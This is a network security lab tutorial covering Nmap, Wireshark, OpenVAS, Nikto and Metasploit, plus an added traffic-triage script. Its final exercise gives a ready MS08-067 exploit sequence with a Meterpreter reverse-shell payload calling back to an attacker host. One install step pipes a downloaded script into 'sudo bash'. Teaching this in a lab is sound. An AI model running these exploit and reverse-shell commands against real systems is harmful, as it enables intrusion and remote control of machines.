Network security is crucial for protecting an organization's data and resources from unauthorized access and cyber threats. This project will guide you through a basic network security assessment, focusing on identifying common vulnerabilities in network configurations. You will use various tools to scan, analyze, and secure your network.
- Basic understanding of networking concepts (IP addresses, subnets, routers, etc.)
- Familiarity with the Linux command line
- A computer with a Linux operating system (preferably Ubuntu)
- Internet connection to download necessary tools
- Lab Environment: A virtualized network setup using VirtualBox or VMware with at least two virtual machines (one as a target and one as an attacker).
- Tools:
  - Nmap
  - Wireshark
  - OpenVAS
  - Nikto
  - Metasploit
Objective: Identify live hosts and open ports on the target network.
Steps:
- Install Nmap:
  sudo apt-get update
  sudo apt-get install nmap
- Scan the Network:
  nmap -sn 192.168.1.0/24
  - This command performs a ping scan to identify live hosts.
- Identify Open Ports:
  sudo nmap -sS 192.168.1.10
  - The SYN scan (-sS) sends raw packets, so it must be run with root privileges.
  - Replace 192.168.1.10 with the IP address of a live host found in the previous step.
Expected Output:
- List of live hosts in the network.
- Open ports on the specified host.
Objective: Capture and analyze network traffic to identify potential security issues.
Steps:
- Install Wireshark:
  sudo apt-get install wireshark
- Capture Network Traffic:
  - Open Wireshark.
  - Select the network interface to capture traffic.
  - Click on the "Start" button to begin capturing packets.
- Analyze Captured Traffic:
  - Look for suspicious traffic such as repeated requests, unusual protocols, or large data transfers.
Expected Output:
- Capture file with network traffic data.
- Identification of any suspicious traffic patterns.
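One way to make the analysis step concrete, as an added example that is not part of the original guide: the script below applies the three heuristics named above (repeated requests, unusual protocols, large data transfers) to a capture exported as tab-separated fields. The tshark export command, the protocol baseline, the thresholds and the sample rows are assumptions constructed for illustration.

```python
"""Triage a packet capture for repeated requests, unusual protocols, large transfers.

Input: tab-separated rows, e.g. exported with (assumed export step):
  tshark -r capture.pcapng -T fields -e ip.src -e ip.dst -e frame.protocols -e frame.len
"""
from collections import Counter

# Assumed lab baseline and thresholds; tune them to your own network.
EXPECTED_PROTOCOLS = {"tcp", "udp", "dns", "http", "tls", "arp", "icmp"}
REPEAT_THRESHOLD = 5        # packets from one source to one destination
BYTES_THRESHOLD = 10_000    # total bytes from one source to one destination

# Constructed sample export (not from a real capture).
SAMPLE = "\n".join(
    ["192.168.1.20\t192.168.1.10\teth:ethertype:ip:tcp:http\t420"] * 6
    + ["192.168.1.10\t192.168.1.30\teth:ethertype:ip:tcp:ftp-data\t1500"] * 8
    + ["192.168.1.10\t192.168.1.1\teth:ethertype:ip:udp:dns\t80",
       "\t\teth:ethertype:arp\t42"]           # non-IP frame: empty address fields
)

def triage(export_text):
    """Return source/destination pairs and protocols that deserve a closer look."""
    packets, volume, protocols = Counter(), Counter(), Counter()
    for line in export_text.splitlines():
        fields = line.split("\t")
        if len(fields) != 4 or not fields[3].isdigit():
            continue                           # skip malformed rows
        src, dst, stack, length = fields
        protocols[stack.split(":")[-1]] += 1   # innermost dissected protocol
        if src and dst:                        # only IP packets have both addresses
            packets[(src, dst)] += 1
            volume[(src, dst)] += int(length)
    return {
        "repeated": sorted(p for p, n in packets.items() if n >= REPEAT_THRESHOLD),
        "large": sorted(p for p, b in volume.items() if b >= BYTES_THRESHOLD),
        "unusual": sorted(set(protocols) - EXPECTED_PROTOCOLS),
    }

if __name__ == "__main__":
    for finding, values in triage(SAMPLE).items():
        print(f"{finding}: {values}")
```

Each flagged pair or protocol is a starting point for a Wireshark display filter, not a verdict; packet counts per pair are only a rough proxy for repeated requests.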
Objective: Perform a vulnerability scan on the target network to identify known vulnerabilities.
Steps:
- Install OpenVAS:
  sudo apt-get install openvas
  sudo openvas-setup
- Configure and Start OpenVAS:
  - Access the OpenVAS web interface (usually at https://localhost:9392).
  - Log in with the admin credentials created during setup.
- Run a Vulnerability Scan:
  - Create a new scan task.
  - Set the target IP address range.
  - Start the scan and wait for it to complete.
Expected Output:
- Report detailing identified vulnerabilities and their severity.
Objective: Assess a web server for common vulnerabilities using Nikto.
Steps:
- Install Nikto:
  sudo apt-get install nikto
- Scan the Web Server:
  nikto -h http://192.168.1.10
  - Replace 192.168.1.10 with the IP address of the target web server.
Expected Output:
- Report detailing potential vulnerabilities, misconfigurations, and other issues with the web server.
Objective: Use Metasploit to exploit a vulnerability identified in previous exercises.
Steps:
- Install Metasploit:
  curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/msfupdate | sudo bash
- Launch Metasploit Console:
  msfconsole
- Select and Configure an Exploit:
  use exploit/windows/smb/ms08_067_netapi
  set RHOST 192.168.1.10
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST 192.168.1.20
  run
  - Replace 192.168.1.10 with the target IP address.
  - Replace 192.168.1.20 with the attacker's IP address.
Expected Output:
- Successful exploitation will open a Meterpreter session on the target machine.
By completing these exercises, you have learned how to identify and assess common network security vulnerabilities using various tools. This knowledge is fundamental for performing more advanced security assessments and protecting network infrastructures.